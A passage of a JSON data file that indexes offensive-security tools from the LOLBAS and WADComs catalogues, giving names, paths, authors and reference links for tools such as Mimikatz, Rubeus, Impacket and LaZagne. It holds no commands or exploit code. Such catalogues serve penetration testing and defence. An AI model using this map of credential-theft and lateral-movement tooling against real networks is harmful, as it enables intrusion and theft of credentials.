Klawikowski","created":"2026-05-28T00:00:00.000Z","contributors":["Konrad 'unrooted' Klawikowski","Lloyd Davies @LloydLabs"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/wsb/"],"count":3},{"id":"lolbas:wsl-exe","name":"Wsl.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Windows\\System32\\wsl.exe"],"author":"Matthew Brown","created":"2019-06-27T00:00:00.000Z","contributors":["Alex Ionescu @aionescu","Matt @NotoriousRebel1","Asif Matadar @d1r4c","Nasreddine Bencherchali @nas_bench","Konrad 'unrooted' Klawikowski","Liran Ravich, CardinalOps"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/"],"count":5},{"id":"lolbas:xbootmgr-exe","name":"XBootMgr.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgr.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgr.exe"],"author":"Avihay Eldad","created":"2025-07-10T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad","Tommy Warren"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/XBootMgr/"],"count":2},{"id":"lolbas:xbootmgrsleep-exe","name":"XBootMgrSleep.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgrsleep.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgrsleep.exe"],"author":"Avihay Eldad","created":"2024-06-13T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad","Yuval Saban @yuvalsaban3"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/XBootMgrSleep/"],"count":1},{"id":"lolbas:devtunnel-exe","name":"devtunnel.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<username>\\AppData\\Local\\Temp\\.net\\devtunnel\\devtunnel.exe","C:\\Users\\<username>\\AppData\\Local\\Temp\\DevTunnels\\devtunnel.exe"],"author":"Kamran Saifullah","created":"2023-09-16T00:00:00.000Z","contributors":["Kamran Saifullah @deFr0ggy"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/devtunnel/"],"count":1},{"id":"lolbas:dotnet-counters-exe","name":"dotnet-counters.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<user>\\.dotnet\\tools\\dotnet-counters.exe"],"author":"Iván Cabrera","created":"2026-08-27T00:00:00.000Z","contributors":["Iván Cabrera @ivancabrera02"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/dotnet-counters/"],"count":1},{"id":"lolbas:dotnet-trace-exe","name":"dotnet-trace.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<user>\\.dotnet\\tools\\dotnet-trace.exe"],"author":"Iván Cabrera","created":"2026-08-27T00:00:00.000Z","contributors":["Iván Cabrera @ivancabrera02"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/dotnet-trace/"],"count":1},{"id":"lolbas:vsls-agent-exe","name":"vsls-agent.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["c:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\Extensions\\Microsoft\\LiveShare\\Agent\\vsls-agent.exe"],"author":"Jimmy (@bohops)","created":"2022-11-01T00:00:00.000Z","contributors":["Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/vsls-agent/"],"count":1},{"id":"lolbas:vstest-console-exe","name":"vstest.console.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\vstest.console.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2022\\TestAgent\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\vstest.console.exe"],"author":"Onat Uzunyayla","created":"2023-09-08T00:00:00.000Z","contributors":["Onat Uzunyayla","Ayberk Halac"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/vstest.console/"],"count":1},{"id":"lolbas:winfile-exe","name":"winfile.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Windows\\System32\\winfile.exe","C:\\Windows\\winfile.exe","C:\\Program Files\\WinFile\\winfile.exe","C:\\Program Files (x86)\\WinFile\\winfile.exe","C:\\Program Files\\WindowsApps\\Microsoft.WindowsFileManager_10.3.0.0_x64__8wekyb3d8bbwe\\WinFile\\winfile.exe"],"author":"Avihay Eldad","created":"2024-04-30T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/winfile/"],"count":1},{"id":"lolbas:xsd-exe","name":"xsd.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\<version>\\bin\\NETFX <version> Tools\\xsd.exe"],"author":"Avihay Eldad","created":"2024-04-09T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/xsd/"],"count":1},{"id":"wadcoms:ADCSEnumaration","name":"ADCSEnumaration","source":"WADComs","platform":["Windows"],"references":["https://github.com/GhostPack/Certify","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.thehacker.recipes/ad/movement/adcs/"],"count":1},{"id":"wadcoms:BloodHound.py","name":"BloodHound.py","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/BloodHoundAD/BloodHound","https://github.com/fox-it/BloodHound.py"],"count":2},{"id":"wadcoms:CredDumpWithoutMimilkatz","name":"CredDumpWithoutMimilkatz","source":"WADComs","platform":["Windows","Linux"],"references":["https://www.ired.team/offensive-security/credential-access-and-credential-dumping","https://www.synacktiv.com/en/publications/lsa-secrets-revisiting-secretsdump"],"count":1},{"id":"wadcoms:Dementor","name":"Dementor","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc","https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack"],"count":1},{"id":"wadcoms:Enum4Linux","name":"Enum4Linux","source":"WADComs","platform":["Linux"],"references":["https://github.com/CiscoCXSecurity/enum4linux"],"count":2},{"id":"wadcoms:Evil","name":"Evil","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/Hackplayers/evil-winrm","https://book.hacktricks.xyz/cryptography/certificates"],"count":3},{"id":"wadcoms:FindUncommonShares","name":"FindUncommonShares","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/p0dalirius/FindUncommonShares"],"count":1},{"id":"wadcoms:Impacket","name":"Impacket","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/dcomexec.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/","https://github.com/SecureAuthCorp/impacket/blob/master/examples/Get-GPPPassword.py","https://podalirius.net/en/articles/exploiting-windows-group-policy-preferences/","https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetADUsers.py","https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/","https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py","https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py","https://github.com/SecureAuthCorp/impacket/blob/master/examples/lookupsid.py","https://www.puckiestyle.nl/impacket/","https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py","https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/","https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py","https://www.sans.org/blog/psexec-python-rocks/","https://book.hacktricks.xyz/windows/active-directory-methodology/pass-the-ticket#pass-the-ticket-attack","https://github.com/SecureAuthCorp/impacket/blob/master/examples/rbcd.py","https://github.com/tothi/rbcd-attack","https://github.com/SecureAuthCorp/impacket/blob/master/examples/rpcdump.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/","https://github.com/SecureAuthCorp/impacket/blob/master/examples/reg.py","https://github.com/SecureAuthCorp/impacket/blob/master/examples/samrdump.py","https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbclient.py","https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py","https://www.varonis.com/blog/insider-danger-stealthy-password-hacking-with-smbexec/","https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy","https://github.com/SecureAuthCorp/impacket/blob/master/examples/services.py","https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#wmiexecpy","https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py","http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html","https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py","https://u0041.co/blog/post/1","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getTGT.py","https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/dacl/grant-rights","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse","https://www.thehacker.recipes/ad/movement/kerberos/ptt","https://www.thehacker.recipes/ad/movement/kerberos/delegations","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/constrained-delegation","https://swarm.ptsecurity.com/kerberoasting-without-spns/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast","https://github.com/fortra/impacket/blob/master/examples/goldenPac.py","https://attack.mitre.org/techniques/T1558/","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server","https://www.thehacker.recipes/ad/movement/mssql","https://www.thehacker.recipes/ad/movement/mssql/execution","https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota","https://www.thehacker.recipes/ad/movement/ntlm/relay","https://www.thehacker.recipes/ad/movement/credentials/dumping/laps","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.thehacker.recipes/ad/movement/adcs/relay","https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials","https://www.thehacker.recipes/ad/movement/dacl/grant-ownership","https://www.thehacker.recipes/ad/movement/domain-trusts/child-parent","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/sid-history-injection","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket","https://attack.mitre.org/techniques/T1558/001/"],"count":48},{"id":"wadcoms:Kerbrute","name":"Kerbrute","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/ropnop/kerbrute"],"count":4},{"id":"wadcoms:LDAPSearch","name":"LDAPSearch","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://linux.die.net/man/1/ldapsearch"],"count":2},{"id":"wadcoms:Mitm6","name":"Mitm6","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/dirkjanm/mitm6","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/"],"count":1},{"id":"wadcoms:NetExec","name":"NetExec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://blog.redteam-pentesting.de/2025/windows-coercion/","https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/scan-for-vulnerabilities","https://www.netexec.wiki/","https://attack.mitre.org/techniques/T1558/004/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast","https://attack.mitre.org/techniques/T1558/003/","https://cybersecurity.bureauveritas.com/blog/timeroasting-attacking-trust-accounts-in-active-directory","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.netexec.wiki/ldap-protocol/enumerate-machineaccountquota","https://attack.mitre.org/techniques/T1087/002/","https://www.netexec.wiki/mssql-protocol/command-execution","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server","https://www.netexec.wiki/mssql-protocol/authentication","https://www.netexec.wiki/mssql-protocol/mssql-privesc","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing","https://www.netexec.wiki/smb-protocol/obtaining-credentials/gpp-password","https://attack.mitre.org/techniques/T1552/006/","https://www.netexec.wiki/smb-protocol/obtaining-credentials/dump-keepass","https://www.netexec.wiki/smb-protocol/spidering-shares","https://www.netexec.wiki/smb-protocol/obtaining-credentials/veeam"],"count":24},{"id":"wadcoms:Nmap","name":"Nmap","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://nmap.org/download.html","https://nmap.org/nsedoc/scripts/krb5-enum-users.html"],"count":1},{"id":"wadcoms:PKINIT","name":"PKINIT","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/dirkjanm/PKINITtools","https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/"],"count":2},{"id":"wadcoms:PSADmodule","name":"PSADmodule","source":"WADComs","platform":["Windows","ActiveDirectory"],"references":["https://github.com/samratashok/ADModule"],"count":1},{"id":"wadcoms:PetitPotam","name":"PetitPotam","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/topotam/PetitPotam","https://www.truesec.com/hub/blog/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory"],"count":1},{"id":"wadcoms:Powershell","name":"Powershell","source":"WADComs","platform":["Windows"],"references":["https://docs.microsoft.com/en-us/powershell/module/activedirectory/","https://github.com/samratashok/ADModule","https://www.labofapenetrationtester.com/2018/10/domain-enumeration-from-PowerShell-CLM.html"],"count":1},{"id":"wadcoms:PwshADmodule","name":"PwshADmodule","source":"WADComs","platform":["Windows"],"references":["https://redfoxsec.com/blog/attacking-kerberos-delegation/","https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html","https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/","https://github.com/samratashok/ADModule","https://docs.microsoft.com/en-us/powershell/module/activedirectory/"],"count":2},{"id":"wadcoms:PyLDAPmonitor","name":"PyLDAPmonitor","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/p0dalirius/LDAPmonitor/tree/master/python"],"count":1},{"id":"wadcoms:PyWhisker","name":"PyWhisker","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/shutdownrepo/pywhisker"],"count":1},{"id":"wadcoms:RPCClient","name":"RPCClient","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html","https://www.ired.team/offensive-security/enumeration-and-discovery/enumerating-windows-domains-using-rpcclient-through-socksproxy-bypassing-command-line-logging"],"count":1},{"id":"wadcoms:Regexe","name":"Regexe","source":"WADComs","platform":["Windows"],"references":["https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/","https://www.hackingarticles.in/windows-persistence-using-winlogon/","https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg","https://docs.microsoft.com/en-us/windows-hardware/drivers/install/runonce-registry-key"],"count":1},{"id":"wadcoms:Responder","name":"Responder","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/lgandx/Responder","https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/llmnr-nbtns-mdns-spoofing","https://attack.mitre.org/techniques/T1557/001/"],"count":2},{"id":"wadcoms:Rubeus","name":"Rubeus","source":"WADComs","platform":["Windows","ActiveDirectory"],"references":["https://github.com/GhostPack/Rubeus","https://github.com/GhostPack/Rubeus#asreproast","https://github.com/GhostPack/Rubeus#asktgt","https://github.com/GhostPack/Rubeus#brute","https://github.com/GhostPack/Rubeus#kerberoast","https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/credential-access/steal-or-forge-kerberos-tickets/constrained-delegation","https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation","https://www.thehacker.recipes/ad/movement/kerberos/ptt","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/diamond-ticket","https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://attack.mitre.org/techniques/T1558/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket","https://attack.mitre.org/techniques/T1558/001/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/unconstrained-delegation"],"count":15},{"id":"wadcoms:SMBClient","name":"SMBClient","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://www.samba.org/samba/docs/current/man-html/smbclient.1.html","https://www.madirish.net/59"],"count":5},{"id":"wadcoms:SMBMap","name":"SMBMap","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/ShawnDEvans/smbmap","https://www.nopsec.com/blog/smbmap-wield-it-like-the-creator/"],"count":3},{"id":"wadcoms:SafetyKatz","name":"SafetyKatz","source":"WADComs","platform":["Windows"],"references":["https://github.com/GhostPack/SafetyKatz","https://www.harmj0y.net/blog/redteaming/ghostpack/"],"count":1},{"id":"wadcoms:Seatbelt","name":"Seatbelt","source":"WADComs","platform":["Windows"],"references":["https://github.com/GhostPack/Seatbelt","https://www.harmj0y.net/blog/redteaming/ghostpack/"],"count":1},{"id":"wadcoms:SharpDump","name":"SharpDump","source":"WADComs","platform":["Windows"],"references":["https://github.com/GhostPack/SharpDump","https://www.harmj0y.net/blog/redteaming/ghostpack/"],"count":1},{"id":"wadcoms:SharpHound","name":"SharpHound","source":"WADComs","platform":["Windows","ActiveDirectory"],"references":["https://github.com/BloodHoundAD/SharpHound3","https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound.html","https://bloodhound.specterops.io/collect-data/ce-collection/sharphound","https://github.com/ZishanAdThandar/pentest/blob/main/notes/ActiveDirectory.md#bloodhound"],"count":2},{"id":"wadcoms:SharpLDAPmonitor","name":"SharpLDAPmonitor","source":"WADComs","platform":["Windows","ActiveDirectory"],"references":["https://github.com/p0dalirius/LDAPmonitor/tree/master/csharp"],"count":1},{"id":"wadcoms:SharpUp","name":"SharpUp","source":"WADComs","platform":["Windows"],"references":["https://github.com/GhostPack/SharpUp","https://www.harmj0y.net/blog/redteaming/ghostpack/"],"count":1},{"id":"wadcoms:SharpWMI","name":"SharpWMI","source":"WADComs","platform":["Windows","ActiveDirectory"],"references":["https://github.com/GhostPack/SharpWMI","https://www.harmj0y.net/blog/redteaming/ghostpack/"],"count":1},{"id":"wadcoms:Snaffler","name":"Snaffler","source":"WADComs","platform":["Windows","ActiveDirectory"],"references":["https://github.com/SnaffCon/Snaffler"],"count":1},{"id":"wadcoms:Windapsearch","name":"Windapsearch","source":"WADComs","platform":["Linux","Windows"],"references":["https://github.com/ropnop/windapsearch","https://www.attackdebris.com/?p=470"],"count":1},{"id":"wadcoms:bloodyAD","name":"bloodyAD","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/CravateRouge/bloodyAD","https://adminions.ca/books/active-directory-enumeration-and-exploitation/page/bloodyad","https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology","https://www.thehacker.recipes/ad/movement/dacl/grant-rights","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse","https://www.thehacker.recipes/ad/movement/dacl/addmember","https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation","https://www.thehacker.recipes/ad/movement/kerberos/asreproast","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast","https://www.thehacker.recipes/ad/movement/dacl/grant-ownership","https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab"],"count":9},{"id":"wadcoms:enum4linux","name":"enum4linux","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/cddmp/enum4linux-ng"],"count":1},{"id":"wadcoms:lsassy","name":"lsassy","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://en.hackndo.com/remote-lsass-dump-passwords/","https://github.com/login-securite/lsassy?tab=readme-ov-file"],"count":1},{"id":"wadcoms:targetedKerberoast","name":"targetedKerberoast","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/ShutdownRepo/targetedKerberoast"],"count":1},{"id":"wadcoms:winPEAS","name":"winPEAS","source":"WADComs","platform":["Windows"],"references":["https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS","https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASexe/README.md","https://book.hacktricks.xyz/windows/windows-local-privilege-escalation"],"count":1},{"id":"wadcoms:adidnsdump","name":"adidnsdump","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/dirkjanm/adidnsdump","https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/","https://attack.mitre.org/techniques/T1590/002/"],"count":1},{"id":"wadcoms:Certify","name":"Certify","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/GhostPack/Certify","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"count":1},{"id":"wadcoms:Certipy","name":"Certipy","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/ly4k/Certipy","https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-and-some-thoughts-on-mitigations-c9d38edc7723","https://www.thehacker.recipes/ad/movement/adcs","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.thehacker.recipes/ad/movement/kerberos/pkinit","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation","https://www.thehacker.recipes/ad/movement/adcs/access-controls","https://www.thehacker.recipes/ad/movement/adcs/certificate-templates","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials"],"count":12},{"id":"wadcoms:Coercer","name":"Coercer","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/p0dalirius/Coercer","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/","https://podalirius.net/en/articles/coercer-an-automatic-authentication-coercion-tool/"],"count":2},{"id":"wadcoms:Comsvcs","name":"Comsvcs","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://lolbas-project.github.io/lolbas/Libraries/comsvcs/","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"count":1},{"id":"wadcoms:CVE","name":"CVE","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/Bdenneu/CVE-2022-33679","https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html","https://horizon3.ai/attack-research/attack-blogs/from-cve-2022-33679-to-unauthenticated-kerberoasting/"],"count":1},{"id":"wadcoms:DFSCoerce","name":"DFSCoerce","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/Wh04m1001/DFSCoerce","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-dfsnm"],"count":1},{"id":"wadcoms:DonPAPI","name":"DonPAPI","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/login-securite/DonPAPI","https://www.login-securite.com/2022/03/28/donpapi/"],"count":1},{"id":"wadcoms:EfsPotato","name":"EfsPotato","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/zcgonvh/EfsPotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"count":1},{"id":"wadcoms:GodPotato","name":"GodPotato","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/BeichenDream/GodPotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato","https://attack.mitre.org/techniques/T1134/002/"],"count":1},{"id":"wadcoms:Hashcat","name":"Hashcat","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://www.thehacker.recipes/ad/movement/kerberos/asreproast","https://attack.mitre.org/techniques/T1558/004/","https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz","https://attack.mitre.org/techniques/T1003/005/","https://www.thehacker.recipes/ad/movement/kerberos/kerberoast","https://attack.mitre.org/techniques/T1558/003/","https://github.com/evilmog/ntlmv1-multi","https://crack.sh/netntlm/","https://www.thehacker.recipes/ad/movement/ntlm/capture","https://attack.mitre.org/techniques/T1110/002/","https://github.com/fortra/impacket/blob/master/examples/secretsdump.py","https://attack.mitre.org/techniques/T1003/002/"],"count":6},{"id":"wadcoms:John","name":"John","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/openwall/john","https://hashcat.net/wiki/doku.php?id=example_hashes","https://attack.mitre.org/techniques/T1555/005/","https://www.thehacker.recipes/ad/movement/kerberos/pass-the-certificate","https://attack.mitre.org/techniques/T1110/002/"],"count":2},{"id":"wadcoms:JuicyPotatoNG","name":"JuicyPotatoNG","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/antonioCoco/JuicyPotatoNG","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato"],"count":1},{"id":"wadcoms:Krbrelayx","name":"Krbrelayx","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/dirkjanm/krbrelayx","https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/","https://www.thehacker.recipes/ad/movement/kerberos/delegations/unconstrained"],"count":1},{"id":"wadcoms:LaZagne","name":"LaZagne","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/AlessandroZ/LaZagne","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1555/"],"count":1},{"id":"wadcoms:ldapdomaindump","name":"ldapdomaindump","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/dirkjanm/ldapdomaindump","https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap","https://attack.mitre.org/techniques/T1087/002/"],"count":1},{"id":"wadcoms:ldapnomnom","name":"ldapnomnom","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/lkarlslund/ldapnomnom","https://attack.mitre.org/techniques/T1087/002/"],"count":1},{"id":"wadcoms:ldeep","name":"ldeep","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/franc-pentest/ldeep","https://www.hackingarticles.in/active-directory-enumeration-ldeep/","https://attack.mitre.org/techniques/T1087/002/"],"count":1},{"id":"wadcoms:MANSPIDER","name":"MANSPIDER","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/blacklanternsecurity/MANSPIDER","https://www.blacklanternsecurity.com/2020-11-04-MANSPIDER/"],"count":1},{"id":"wadcoms:Mimikatz","name":"Mimikatz","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates","https://attack.mitre.org/techniques/T1552/004/","https://www.dcshadow.com/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dcshadow","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dcsync","https://attack.mitre.org/techniques/T1003/006/","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords","https://attack.mitre.org/techniques/T1555/004/","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/","https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz","https://attack.mitre.org/techniques/T1003/002/","https://attack.mitre.org/techniques/T1003/004/","https://book.hacktricks.xyz/windows-hardening/ntlm/pass-the-hash","https://attack.mitre.org/techniques/T1550/002/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://attack.mitre.org/techniques/T1550/003/","https://adsecurity.org/?p=1275","https://attack